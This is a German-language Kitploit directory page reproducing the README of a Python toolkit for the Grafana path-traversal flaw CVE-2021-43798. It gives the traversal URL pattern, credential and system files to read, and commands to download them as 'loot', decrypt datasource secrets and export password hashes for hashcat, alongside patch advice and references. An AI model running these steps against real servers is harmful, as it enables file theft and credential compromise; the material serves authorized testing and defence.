Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-43798 — Python-Toolkit für autorisierte Tests von CVE-2021-43798 Grafana Path Traversal, mit PoC für beliebige Dateiauslese, Entschlüsselung von Geheimnissen und Export von Benutzer-Hashes für Sicherheitsbewertungen. | Kitploit
Tools/GitHubGitHub/okymi-x/cve-2021-43798
Passwort-CrackingVerschlüsselungs-/EntschlüsselungstoolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubokymi-x/cve-2021-43798

CVE-2021-43798

Python-Toolkit für autorisierte Tests von CVE-2021-43798 Grafana Path Traversal, mit PoC für beliebige Dateiauslese, Entschlüsselung von Geheimnissen und Export von Benutzer-Hashes für Sicherheitsbewertungen.

Repository anzeigen
3vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-43798 – Grafana – Beliebiges Dateilesen

Python-Werkzeugkasten für autorisierte Tests von CVE-2021-43798, einer Path-Traversal-Schwachstelle in Grafana, die es nicht authentifizierten Angreifern ermöglicht, über Plugin-Asset-Pfade beliebige Dateien zu lesen.

Dieses Repository enthält:

  • grafana_poc.py: interaktiver Proof-of-Concept (PoC) zum Lesen beliebiger Dateien, der heruntergeladene Dateien lokal speichert.
  • grafana_pass_decryptor.py: Hilfsprogramm zur Entschlüsselung von verschlüsselten Grafana-Datenquellen-Geheimnissen, wenn grafana.ini und/oder der secret_key verfügbar sind, sowie zum Exportieren von Grafana-Benutzerpasswort-Hashes aus der grafana.db.

Warnung

Verwenden Sie dieses Projekt nur auf Systemen, die Sie besitzen, betreiben oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Nicht autorisierte Ausnutzung kann sensible Dateien, Zugangsdaten, private Schlüssel, Datenbankinhalte und Benutzerpasswort-Hashes offenlegen.

Zusammenfassung der Schwachstelle

CVE-2021-43798 betrifft Grafana-Versionen von 8.0.0-beta1 bis 8.3.0. Die gepatchten Versionen sind 8.3.1, 8.2.7, 8.1.8 und 8.0.7.

Die Schwachstelle ist über Plugin-Asset-Pfade wie den folgenden erreichbar:

root@kitploit:~
/public/plugins/<plugin-id>/../../../../../../../../../../../../..<datei>

Häufig bei autorisierten Validierungen angefragte Dateien sind:

root@kitploit:~
/etc/passwd
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/self/cmdline

Der Zugriff hängt von den Betriebssystemberechtigungen des Grafana-Prozesses ab.

Voraussetzungen

  • Python 3.10+
  • requests
  • pycryptodome oder cryptography zur Entschlüsselung von Geheimnissen

Abhängigkeiten installieren:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Anleitung zur Nutzung

1. Dateien mit dem PoC lesen

Führen Sie den interaktiven PoC gegen ein autorisiertes Ziel aus:

root@kitploit:~
python3 grafana_poc.py -H http://ziel:3000 -o loot

Geben Sie an der Eingabeaufforderung absolute Pfade ein:

root@kitploit:~
Download file > /etc/passwd
Download file > /etc/grafana/grafana.ini
Download file > /var/lib/grafana/grafana.db
Download file > exit

Heruntergeladene Dateien werden im Ausgabeverzeichnis gespeichert, wobei eine sichere Version des entfernten Pfades beibehalten wird, z.B.:

root@kitploit:~
loot/etc/grafana/grafana.ini
loot/var/lib/grafana/grafana.db

2. Grafana-Geheimnisse entschlüsseln

Wenn Sie sowohl grafana.ini als auch grafana.db haben, kann das Entschlüsselungswerkzeug den secret_key aus der Konfigurationsdatei lesen und versuchen, verschlüsselte Geheimnisse von Datenquellen, Alarmmeldungen und Plugins zu entschlüsseln:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db

Manuelles Entschlüsseln eines einzelnen verschlüsselten Blobs:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --secret-key SW2YcwTIb9zpOOhoPsMm \
  --blob R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Ausgabe als durch Zeilenumbrüche getrenntes JSON:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --json

3. Benutzer-Hashes exportieren

Grafana-Benutzerpasswörter sind keine verschlüsselten Geheimnisse. Es sind gesalzene PBKDF2-Hashes. Exportieren Sie sie aus der user-Tabelle:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --users

Nur hashcat-Modus 10900-Zeilen exportieren:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --db loot/var/lib/grafana/grafana.db \
  --users \
  --hashcat > hashes.txt

Behebung

Aktualisieren Sie Grafana auf eine gepatchte Version:

  • 8.3.1 oder neuer für den 8.3-Zweig
  • 8.2.7 oder neuer für den 8.2-Zweig
  • 8.1.8 oder neuer für den 8.1-Zweig
  • 8.0.7 oder neuer für den 8.0-Zweig

Falls ein sofortiges Update nicht möglich ist, empfiehlt Grafana in seinem Advisory, einen Reverse-Proxy vor Grafana zu schalten, der Anfragepfade normalisiert, um das Path-Traversal-Verhalten zu mildern. Behandeln Sie dies als vorübergehende Maßnahme, nicht als Ersatz für das Patchen.

Referenzen

  • Exploit-DB 50581: https://www.exploit-db.com/exploits/50581
  • Referenz-Repository von jas502n: https://github.com/jas502n/Grafana-CVE-2021-43798
  • Grafana-Sicherheitshinweis GHSA-8pjx-jj86-j47p: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • Grafana-Blogbeitrag zu CVE-2021-43798: https://grafana.com/blog/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
  • NVD-CVE-Eintrag: https://nvd.nist.gov/vuln/detail/CVE-2021-43798

Danksagung

Der ursprüngliche öffentliche PoC wird s1gh auf Exploit-DB zugeschrieben. Der Workflow zur Entschlüsselung von Grafana-Geheimnissen ist inspiriert von öffentlicher Forschung und Beispielen von jas502n/Grafana-CVE-2021-43798, wobei dieses Repository ein Python-Hilfsprogramm für Labor- und autorisierte Assessment-Workflows bereitstellt.

Tool herunterladen